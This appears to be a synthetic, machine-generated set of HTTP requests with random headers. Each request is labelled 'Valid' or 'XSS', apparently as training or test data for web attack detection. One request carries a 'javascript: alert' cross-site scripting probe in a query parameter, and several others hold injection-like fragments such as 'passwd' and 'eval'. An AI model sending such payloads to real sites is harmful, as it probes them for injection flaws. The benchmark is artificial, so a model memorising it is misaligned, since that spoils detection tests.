If-Unmodified-Since: Mon, 16 Apr 07 13:14:24 UTC
If-Match: "ocfpziy6HWCt2iUJ7EP"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.3
Pragma: jwi=mge4Xs8
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: Basic eWNkeXBuOXg6ZVIxZWk=
Range: 3768-4236
Referer: /ohr1h/elow.fgf
TE: gzip;q=0.4,trailers,chunked
Trailer: Host
User-Agent: aNTgqeu http://www.nbsodh.net
UA-CPU: StrongARM
UA-Disp: 6746,243,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 516x1974
Via: debebm/9.7 www.taht.png, FTP/3.1 180.206.183.241:46
Transfer-Encoding: compress
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 187 39.158.215.98 "I6Fton" "Mon, 11 Aug 08 06:05:52 GMT"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15745
Start - Id: 11367
class: Valid
GET /i6M4hyciiy57rah/dBM@cRsBqX.pl? HTTP/1.1
Host: 65.229.39.207
Connection: isaddLtn
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity, identity;q=0.0, identity, deflate;q=0.6
Accept-Language: E-rMoete
Cache-Control: no-store
Client-ip: 242.179.130.228
Cookie: hwnc7e=s
Cookie2: $Version="6"
Date: Sat, 05 Jun 04 01:13:38 UTC
ETag: "AL1P3Im9xyb_Ng.B"
Expect: 100-continue
From: ap2s@tiVznaj.com
If-Modified-Since: Tue, 12 Jul 05 18:18:20 UTC
If-Unmodified-Since: Sun, 24 May 09 01:34:21 CET
If-Match: *
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: *
Max-Forwards: 86
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rtslr"
Authorization: Digest realm
Range: -97,143727-
Referer: http://pnnlsmtl.ch/acitucd/ossji0/caertrm/en9ratme.txt
TE: chunked;q=0.5,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (compatible; sDtgjem; Solaris; edgle; jyfarh)
UA-CPU: StrongARM
UA-Disp: 018,4597,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: FTP/9.4 www.odrci.jpg, FTP/2.4 11.94.55.49
Transfer-Encoding: jIgwf
Upgrade: 07rd3w/0.6, sawral/4.2, iioa/6.4, luE/7.0, isdes/2.0
Warning: 883 www.eeiyiwe.jpeg "akusdr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11367
Start - Id: 27445
class: Valid
GET /0T.YSMUkEEBPsPRH/vsurzw5lT0nueo/Ores/Ecde8aeYnnnorssia/s7td/ienH4y9T0MTIuIOtCPj9.cfm?iqysujttux=0515609&focqotsct=h9R&qnla=hba&fruS=DopJqeesock_streamoghe%24N&utcihtH2=20&tral2en2plSSt=f6hNe&Re6y1scroyeo=4&hdhot=+Pe&ediraRk7n=likeZuhiEn6tEearm&Dlike5jM=libh+sdwinnt&staomsiaohata=Yr HTTP/1.1
Host: 38.192.118.16
Connection: enre
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.3, compress;q=0.1, deflate, identity, compress
Accept-Language: i-4eo;q=0.0
Cache-Control: max-age=7
Client-ip: 213.169.24.78
Cookie: vr9=epnAUlB;KgVstdinXeval9wUopenAX=s3@8ee);TXE3sJ=Pr sstesisihiuaL;gtuuapbbnFuoC=Ih;WMxfPmgRxl=S4n2
Cookie2: $Version="3"
Date: Tue, 08 May 07 22:20:46 GMT
ETag: W/"H.wPWoYeJYgMrTAy3"
Expect: coouoR
From: nt7minop@lhace.uk
If-Modified-Since: Wed, 08 Jun 05 11:06:39 UTC
If-Unmodified-Since: Sat, 02 Feb 08 11:43:24 GMT
If-Match: *
If-None-Match: "gaVlh77RJtgbbEj5"
If-Range: "3J6xqMq2UFoyUPTREGt"
Max-Forwards: 188
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic NmVvclY6c3l0NA==
Authorization: Basic b2FUczpOYWJzRWNu
Range: -0,59-
Referer: /amsNiem/EGo3e9/nnyti/rrgfen/3eUI.zip
TE: gzip,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.7 (Windows; U; WinNT 5.0; em-nT; rv:4.7.9) Gecko/57399725
UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 802x162
Via: 5.6 www.hnn7r.jpeg, neds/1.9 119.83.65.42:5721, 1.3 www.elLha.css
Transfer-Encoding: auiNpP
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 540641181
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27445
Start - Id: 47205
class: XSS
GET /PS/Ersvxzd/nsh0fg/Mq8Kp0J/ouSfzZXIsbmP/anikUEZPRb/eOsw8smaiac/W4I@OSZlO.tiff?uYL4n996_M8=otmprae+%7EoaFscfr+leme&xlti=102666&1aa0mndfrlhhop=jt7fayhttp&pj=9905&1iaold=057082&tesCufnn=%3A&eh=javascript%3A++alert++++%28++%22+++oa3jda.T9%22%29&rameJrocg=4sc2aaila&0d4coeqhofalter=1&I6uV6f1HKlib3=5-HvCLZA3I1&TPQTSBNG=tynE7oarnrtu&aiaoe7mpr=8OZ1iMk7J066&mieT@cBAJ=steeitoab&Ok=oPr&ramgeetpN9=99748612 HTTP/1.1
Host: www.tNqaO.net:9670
Connection: keep-alive
Accept: image/*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 63.161.16.102
Cookie: hotkiEund3ss=8952;src4uheo=xn/passwd;mieEm=0I;e7Esiojretde=]ss;@tMin3AJ=rs'lsW5i~e=wp-[n-
Cookie2: $Version="8"
Date: Wed, 10 Dec 08 18:32:53 UTC
ETag: "owjdohDQxUXpeBzPAh5"
Expect: 100-continue
From: cocoop6n@AdGe4uodie.be
If-Modified-Since: Tue, 05 Sep 06 06:44:28 GMT
If-Unmodified-Since: Tue, 31 May 05 10:55:54 CET
If-Match: *
If-None-Match: *
If-Range: "IS_9Bx@9GpcJEoDmb"
Max-Forwards: 296
MIME-Version: 9.5
Pragma: rbmbl=ns
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest response="CE48E90eE2c12EECF4BDF2DCcd180256"
Range: 676-108618,2650-4238
Referer: /EFLB2eAe.txt
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: an0nift
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/3.5 www.sfdrfbsa.tiff, FTP/4.1 www.Rpf4onp.js, 5.3 www.eEjed8e.html
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 160 135.194.21.238 "stoAee6l" "Sat, 24 Jan 09 11:09:16 UTC"
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47205
Start - Id: 32048
class: Valid
GET /LKusro/n2eaiserhhescattA/_opt30_MA3HjIs@/fK2Ssd6AR/Tv.VIY/fKzOkowuPGFbUrBkO/npIf2to@S.gif?erDeicede=7+connect4-openijH2tegy+pi&sitar=26207572&3On=27928786&dolitdy=a&orrndtodinl=18894856&59d=25&vSEgeoew=itDdr&snsXbnVatl=a2U4gLA5Zot%40 HTTP/1.0
Host: www.eooi.net
Connection: errF
Accept: application/*, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: 9-rgs;q=0.8, kmonjp9-lbnTA;q=0.1, xtncniuk-r
Cache-Control: no-cache
Client-ip: 75.172.15.208
Cookie: q2TU06havingMn=vusSr;.rKI4JK2pbody=eeooeB;Nq0e1ado=otVn-a7l%t;w.autoexecS6IycH=0j0nsneoi
Cookie2: $Version="7"
Date: Fri, 31 Dec 04 10:01:28 UTC
ETag: "rMby0oEYpb43U340YH"
Expect: e2t5sri=tiuotnie;shB6ag=ncNk
From: 7Shh@remFh.cz
If-Modified-Since: Wed, 24 Aug 05 22:37:48 GMT
If-Unmodified-Since: Tue, 30 May 06 03:14:20 GMT
If-Match: "gnHH1U.2mML2.Xar5"
If-None-Match: "h5ESyJVPy1ppMpgG@"
If-Range: Sun, 24 May 09 11:45:51 UTC
Max-Forwards: 06
MIME-Version: 3.7
Pragma: oxfaa='iettia'
Proxy-Authorization: Basic YVlmZDo1c3Ny
Authorization: NTLM MTlzYWVzN2F0bmNhdGlmbGhwZHNkYWFhb3lVYW5BeWh1
Range: 23518-
Referer: http://www.qmec1T.de/nuawki.asp
TE: chunked;q=0.7,trailers,chunked
Trailer: If-Range
User-Agent: r78X8jcT http://www.Er1ne.be
UA-CPU: x86
UA-Disp: 6016,019,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: nhaO; ftuhons=0mtut
Upgrade: nswin/2.0, nrnelw/2.2
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 158.151.229.231
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32048
Start - Id: 22567
class: Valid
GET /2NHqD6f2SZdZqq_/ncBJwSJqzz/anrejeUe/aLLBdUvkFA9058.Q8d8k/YtqTYao8b0/tWsHgksm3-BMe./i4UFLj/KT7M5P.html?nr3l0herytdr=hfioeirp2ctsiRteca&9sweM4Clnsae8lz=h%40b-P&ldygr8yrisri=h+%3B HTTP/1.1
Host: 233.6.120.217
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.0
Cache-Control: min-fresh=32
Client-ip: 14.142.132.191
Cookie: E4deqlthoofz=7nlfis;c8AncTlYcE=8509566;luTgyBbitqeui=ktdTdrop;eihnbT=cnnee eoesock_streamtdn;ezprnltyuli=405
Cookie2: $Version="97"
Date: Fri, 23 Jun 06 13:09:31 UTC
ETag: W/"XAsOYXqELAWcTGvV"
Expect: sbtwss=YalrsR9d;tefcoaav
From: tetoseli@i9ihet.it
If-Modified-Since: Sun, 31 Oct 04 01:31:09 UTC
If-Unmodified-Since: Tue, 05 Feb 08 05:24:15 UTC
If-Match: *
If-None-Match: "22jFQntsKMcztLPXNTn"
If-Range: Fri, 10 Oct 08 18:53:13 UTC
Max-Forwards: 1604
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: Basic c2lyaHdhY3A6YXZ1dE8=
Range: 008-622747,-490549,85-794080
Referer: /5mLnile.cfm
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: bTmCqd http://www.nimnmm.st
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1663x456
Via: b6e/8.5 197.166.82.16
Transfer-Encoding: identity
Upgrade: sric/4.6, ineo7/5.6, uiont9/0.3, wEco3/6.9
Warning: 651 www.nfit.gif "ieetdewtnneo6h" 
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 2569472
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22567
Start - Id: 17622
class: Valid
GET /e3_-IhZS.WZYIX/M3I-FAi/yE/lIfNuZNKuQCdF2y1v3/2FftD/gVM2eval/k0O4V1GJ/saoxdteloltheriox42a/8.zaIPR_RO./r3ila.css?nlsepchrm=5&5twxm=ed+e+a7&bzvbnxbKNci=tnerorMlatn1bnmoa&PF9_zJAJ@tp=efsN1X HTTP/1.1
Host: 11.175.111.221:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.4, deflate;q=0.7, compress;q=0.0, gzip;q=0.2, gzip
Accept-Language: DhliSt-jzstibi;q=0.1, l4-sc9asi;q=0.5, mdtta-sn5n, leib8-paiqa
Cache-Control: max-age=3
Client-ip: 198.210.179.113
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="35"
Date: Thu, 24 Aug 06 17:22:09 CET
ETag: W/"Q@.Uo.HrKdkFuTJ66af"
Expect: 100-continue
From: croeol2e@tiEhh0b.de
If-Modified-Since: Sun, 16 Aug 09 09:50:43 CET
If-Unmodified-Since: Thu, 14 Jul 05 12:57:26 CET
If-Match: "vEDnAcbPGtc3Bdf"
If-None-Match: "JAwT904ATXYpdnMz0"
If-Range: *
Max-Forwards: 6064
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/ote8cdid.gif
Authorization: NTLM R2phWXhyRnROdHQ2ZW5zaGRvb2NlZWFlcmUzY3pTYWFSNDJhdGRlYWF1b29pcnQ=
Range: -948
Referer: /mnryO/Aiatishg/hphrhi/aenlo.shtml
TE: trailers,trailers,chunked
Trailer: TE
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 9.6; hs-oe; rv:1.2.3) Gecko/52122337
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 519x8664
Via: 3.0 154.198.131.142
Transfer-Encoding: gzip
Upgrade: rnew/5.4, 0Pl/5.4, sanc/0.3, asnsH/5.3
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 68.35.229.1
X-Serial-Number: 9137619285
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17622
Start - Id: 15327
class: Valid
GET /njqdSoIz-7.tiff?1group byBSH7wOYlG=Azuac%3Aa&z4b4oqh87=200233 HTTP/1.1
Host: 164.12.69.157:80
Connection: Eu6d
Accept: video/*;q=0.6
Accept-Charset: x-mac-greek;q=0.3, iso-2022-kr, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 102.215.170.42
Cookie: ons=dENpstshpy;eenq=9;dlttpa=h~o;4VKSechodelete0F-rXt=hs7aIs;liyn1eu6sik=9cpoo6/ce3hwc7;trnissccetasnfe=JucTE;a l
Cookie2: $Version="3"
Date: Tue, 30 Jan 07 08:34:40 CET
ETag: "Y0YUWysM8GX6fXC8j"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Thu, 15 Jun 06 02:09:29 CET
If-Unmodified-Since: Sun, 22 Aug 04 10:54:24 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Apr 07 22:46:55 CET
Max-Forwards: 118
MIME-Version: 7.7
Pragma: teiaLbn=ttatH
Proxy-Authorization: Digest username="lsNo"
Authorization: Basic ZmNycmRhOmU3aHNobA==
Range: 604-0,1-54,-12
Referer: /6sstoh/s2hHu/wedt/uvgiMA/etadyr9n.jsp
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 3.9; nn-to; rv:4.5.2) Gecko/81125594
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5504x488
Via: 6.6 103.177.70.213, 1.9 7.23.70.111, 9.2 www.MxIyhar3.shtml
Transfer-Encoding: zohdns; feham=itesw
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 080 17.39.21.39 "2etaolnde" 
X-Forwarded-For: 139.65.0.173
X-Serial-Number: 7835814731
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15327
Start - Id: 3034
class: Valid
GET /bhwTnee/t44RU-GoYIjSpD6RRM3/kwnd@oYlXG3/eR3D-AQJpXa_t/s5.rQ-sEyKpSxK_1yI.jsp?Inbsx9e6Ce2=c7 HTTP/1.1
Host: 241.159.81.93
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 45.196.69.200
Cookie: ho7tnpeieeweeo=b46cQvrB;eeter9hdeiHre=5cedlaRnpe
Cookie2: $Version="42"
Date: Sat, 29 Nov 08 14:56:18 GMT
ETag: W/"H8jMrigeLVXGfzUHqi"
Expect: 100-continue
From: clms@lki1al.be
If-Modified-Since: Thu, 13 Oct 05 19:48:10 CET
If-Unmodified-Since: Sat, 19 May 07 19:43:40 GMT
If-Match: "AcT-dqD64K.PTKKY@"
If-None-Match: "EYXxnozAoyIJDrynIUv"
If-Range: *
Max-Forwards: 641
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic dG9laGVlRDplZ0VvdA==
Authorization: oephon tholnnn=latnher
Range: 37991-,-13
Referer: http://www.cI1i.org/n6wo/easi9/dituns/nuAzirst.dll
TE: gzip;q=0.7,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/9.1 (compatible; Konqueror/5.1; Win98; prsd)
UA-CPU: PowerPC
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 961x9401
Via: 9yehT/0.9 220.54.166.101
Transfer-Encoding: identity
Upgrade: nbjn/1.7
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 214.228.126.215
X-Serial-Number: 2317803874
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3034
Start - Id: 15530
class: Valid
GET /iiGe8ipe7f/ef3i4hl.php3?aivta5=rU7IHR8yBCQ1&sardpn6=e9h&1g-TWufromPG=%3FR5 HTTP/1.1
Host: 159.115.66.24
Connection: stnnn
Accept: video/*, audio/basic;q=0.1
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: t-kusio;q=0.4, etn-eat8n;q=0.0
Cache-Control: no-store
Client-ip: 111.222.87.162
Cookie: KMc9I=a;8QGRKacceptDXpkxg=e1vi.un;riEsi7etjase=nliT
Cookie2: $Version="11"
Date: Sat, 07 Jul 07 21:30:02 CET
ETag: W/"sgEjgNRuq0@PLLvoX"
Expect: laspri
From: bdoa@aosaz.com
If-Modified-Since: Mon, 23 Feb 04 08:57:34 GMT
If-Unmodified-Since: Tue, 07 Aug 07 23:36:03 UTC
If-Match: ".g7BSPb7OF8Rvss"
If-None-Match: *
If-Range: Wed, 27 Oct 04 21:24:01 GMT
Max-Forwards: 6699
MIME-Version: 6.7
Pragma: le=h
Proxy-Authorization: NTLM aXNlYWx0eWRvbThoYTVkZWFvVXRtaXNhd2RVZWRtbTBs
Authorization: Basic c3BkeTozcnRwaQ==
Range: -6928,85713-63070
Referer: /8oov.pl
TE: trailers,deflate,gzip;q=0.9
Trailer: Range
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 0.0; ls-t6; rv:1.0.0) Gecko/31292186
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3257x239
Via: HTTP/8.9 www.rs14.jpeg, 4.3 24.139.31.98
Transfer-Encoding: compress
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 699 16.90.177.88 "ioqoert" "Mon, 13 Jun 05 10:45:47 GMT"
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 46412923699025736
----: --------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 15530
Start - Id: 16638
class: Valid
GET /F@RZlibWx9Hww/ko/WhaSraenmr1etr/n_C7wKgJE8-/RxVTEm2.gif?tbn0o=ehaflinksrfrr%5DcmrO&5ocussqaltc=R9ezgabye&nbrsoahnZ=+xsnRoEo%3Dnl2hewnt&0xBr=t%24nai7g7fhincludedapA&ajorI7suiwsla=Eig&.ElGKu=su_mtZVAS2&ma=fpihht1%5D&ou8eKdeon7o=32&Eix=dt0iee2%2B&5neZwd4Stsoe=3wk9Cl9 HTTP/1.0
Host: www.oQntse.org
Connection: An1q
Accept: */*
Accept-Charset: koi8-r, gb2312;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=9121
Client-ip: 2.84.105.219
Cookie: eneTjd9eide0upn=41672562;6tehasttNt=mtr;faeEcigoehne=include/?&pxp_lelht'/eeec
Cookie2: $Version="281"
Date: Tue, 30 Jun 09 13:35:49 UTC
ETag: W/"zQjI_b86chHKmKbG"
Expect: 8rOrt
From: tone4@jefc.ch
If-Modified-Since: Mon, 15 Aug 05 16:41:02 GMT
If-Unmodified-Since: Sat, 25 Feb 06 07:46:01 UTC
If-Match: *
If-None-Match: "TcOR1BQAJ6ZMUXhpOlr"
If-Range: Sun, 27 Nov 05 18:40:43 UTC
Max-Forwards: 7209
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM dHNhZXNyZWRvNG90cnJhZXBqYXIzdmFPdGdubHRlcG5u
Authorization: mrmz5j ttjih=om0t4e
Range: 38173-
Referer: /byai/Ttd5ta/dteyanc/tdwdOegA.php
TE: gzip;q=0.8,gzip
Trailer: From
User-Agent: zHJbQ2b http://www.1laodoa.de
UA-CPU: x86
UA-Disp: 4468,351,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: ebr/2.5 54.16.4.27, HTTP/1.7 92.109.116.34, 8.5 81.183.4.91
Transfer-Encoding: gzip
Upgrade: lte/0.8, ascmyo/0.4
Warning: 776 12.83.110.221:697 "intttghuuaPl" "Tue, 01 Mar 05 05:24:24 UTC"
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6104122445139965688
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16638
Start - Id: 1139
class: Valid
GET /dpliNhaw/u4fK06aU_/tmphavingc@rpTxp_/GXRdsM.e/Tanhnboseehte/tbsoOhlenigez/sSC-7@oGDmOHRCTTlX3/rcT1/t3Ltehiroun/uezyNjfvNvEUlcnh3n@.css?afeN=ugincludePvtassfceHwe&7uhXtUa=ril&eIaefy0s7shsRre=fobniEee&hsAnecd=01 HTTP/1.0
Host: 216.137.237.42
Connection: ehse
Accept: application/rtf;q=0.4
Accept-Charset: euc-kr;q=0.3, x-mac-arabic;q=0.6, iso-8859-2, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 74.201.154.177
Cookie: uxa4u=7;yteq71t=oVV;wsnkn=7470
Cookie2: $Version="73"
Date: Sun, 03 Sep 06 06:52:03 UTC
ETag: "QCVxY1nPMyeUKq6W4VSG"
Expect: nhDardk=aRxp7ou;lirce=Ie3mus
From: 7nAao@xchnNanrsu.be
If-Modified-Since: Tue, 15 Mar 05 03:38:14 UTC
If-Unmodified-Since: Sun, 21 Aug 05 10:16:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 884
MIME-Version: 9.9
Pragma: e=hdo2
Proxy-Authorization: Digest username="neou"
Authorization: NTLM YVRXZWhiZUd0b3VkbHdwZXI5dHlkYWlyaXRqc2F3VW5pZQ==
Range: 6-
Referer: /ssp497a/tdirrw.htm
TE: trailers,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 9.3; lD-oi; rv:0.7.5) Gecko/31665355
UA-CPU: PowerPC
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2688x3357
Via: HTTP/7.5 www.peeoaieH.htm, herN/7.3 www.1pci.gif:72
Transfer-Encoding: deflate
Upgrade: elda/1.3, rabet/8.0, rst6t/4.8
Warning: 281 www.stcj.css:27 "ensgdtO8t" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 2559781115127
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1139
Start - Id: 26961
class: Valid
GET /egs33nsotaoatri/qauderosieu/rkDD4kryYhd/tcbQXs.shtml?2nrkdle=updatendrop4eotyysnh9Ce&Yxkn=u3euh&s4Pu=eKlzI8hqLA&tu7ifnel7ttstd=o&RH4zUd=ktHptnaithksje&lpS=32&9m.F-Kslg=%2Bhauh%29ramekhtsuvz3%7Cq&iteik=lvfMjlq2t&jltmc3h=39tesr%2Bcilo&9h=obea6hrhfIeTrdbs3&sfaroEgxp8uYc=iAi9VuwLkG HTTP/1.1
Host: www.hionruna.biz
Connection: close
Accept: video/*;q=0.2, application/zip, text/html
Accept-Charset: iso-8859-6;q=0.2, utf-7, euc-cn;q=0.8, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.0, deflate, compress;q=0.8, compress
Accept-Language: Fi-lnt, nktvoEn-rmdtoEtu;q=0.9, eatekvh-giT;q=0.9, tdd2-q
Cache-Control: no-transform
Client-ip: 239.237.217.85
Cookie: Ansehie3a=68534;z6BiZrY6Pb=wsete8pereet;wsmfl3=$eoul;o A2;aoJoU7nmh3r=fnoz;IVX9NtZoc5Fw=6;fxEV6R=l0f@i
Cookie2: $Version="194"
Date: Wed, 25 Jul 07 20:46:29 CET
ETag: W/"CboD6nDft9xjGDtyWeg"
Expect: 100-continue
From: ttmky@IYeeg2.st
If-Modified-Since: Sat, 15 Sep 07 05:23:53 GMT
If-Unmodified-Since: Wed, 03 May 06 19:49:57 UTC
If-Match: *
If-None-Match: *
If-Range: "XsPYhrOZhZ7i22Rh"
Max-Forwards: 554
MIME-Version: 7.2
Pragma: resti=Eed
Proxy-Authorization: Digest realm
Authorization: NTLM bjB0cmJxbklxZW90bXNjaTFoY2ltZWFvdGhsM2Vld1RvbGVjMmlvYm5lTg==
Range: -022
Referer: /sOcpm/h8ovbu/agapnK.mdb
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.4 (X11; U; Linux i386 8.6; EC-rc; rv:8.0.0) Gecko/72788100
UA-CPU: x86
UA-Disp: 181,245,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6546x3443
Via: HTTP/6.8 www.n7Obagty.shtml
Transfer-Encoding: gzip
Upgrade: vfUsoh/7.3
Warning: 610 www.xmte.htm:73 "sebnthrcdtgboft" 
X-Forwarded-For: 188.77.210.37
X-Serial-Number: 781010344531
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26961
Start - Id: 33617
class: Valid
PUT /msneia/lybsw.htm? HTTP/1.1
Content-Length: 126
Content-Language: Vesa,oa4n3yst,ata
Content-Encoding: identity
Content-Location: http://www.arru.net/eegaiN/2ahaif.css
Content-MD5: ZGRoaFNhbnN2aGkxdWZxaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 14:55:10 UTC
Last-Modified: Fri, 16 Jun 06 18:05:44 GMT
Host: www.wtmt5xot.biz:385
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: *
Cache-Control: max-age=71
Client-ip: 47.0.91.92
Cookie: r8yaes=491670;tbrewnetknse=xIrp
Cookie2: $Version="43"
Date: Mon, 30 Aug 04 04:53:20 GMT
Expect: 100-continue
If-Modified-Since: Tue, 14 Oct 08 14:27:40 GMT
If-Unmodified-Since: Thu, 22 Jan 09 09:49:28 UTC
If-Match: "4bN97Jcb1OQRzH-"
If-None-Match: *
If-Range: Tue, 14 Sep 04 17:02:31 UTC
Max-Forwards: 3656
MIME-Version: 8.4
Pragma: e=j
Proxy-Authorization: Digest username="esl1Ol"
Authorization: Digest opaque="tiropibn"
Range: 409459-7,-297771
Referer: /gZ7s/iamw.conf
TE: deflate;q=0.3,trailers,trailers
User-Agent: rtrtHeo/4.6.4.8.3
UA-OS: Win98
UA-Color: color8
UA-Pixels: 468x6101
Via: 4.8 135.130.63.17, 5.3 www.Atve9Bfr.png, 0.2 www.nIOaei2e.jpeg
Transfer-Encoding: euhRt; enrrhou=irRao
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158
----: ----------------------------------------------

tiTtaed1Hhf=img  dxib>0&Ei5el1s=Tbnre&ps=7&hws1iOtse=sRdu&nbm3mkaL=2&Scg@=sRNyx4&trasrADtsla8nnH=94398&nrllflfYe=snn3eoaJcer

End - Id: 33617
Start - Id: 29537
class: Valid
GET /Eqfdlhe/evalEQMbgsoundlQscripty4yy.html?b36fr=9654&aenarrerryph=nO18pv8w.bD&ope=sw-yjm%40X&selhitoayxa=464 HTTP/1.0
Host: 83.205.131.72
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: idne8-i2n, se2ntt-Ch, zf0incOm-apuO;q=0.8, vob-se6
Cache-Control: max-age=90
Client-ip: 199.216.21.216
Cookie: rroy=zuI;gend69tBvnre=991;XLtK=07;vC6Y4leRodoapl=4029691976;ivn2sdesUA=Ty;6iq0nI=3jg
Cookie2: $Version="080"
Date: Thu, 27 Jan 05 02:33:58 GMT
ETag: W/"NDQW6P5-4Fw@IQFzmMn6"
Expect: 100-continue
From: rain@uiqt.com
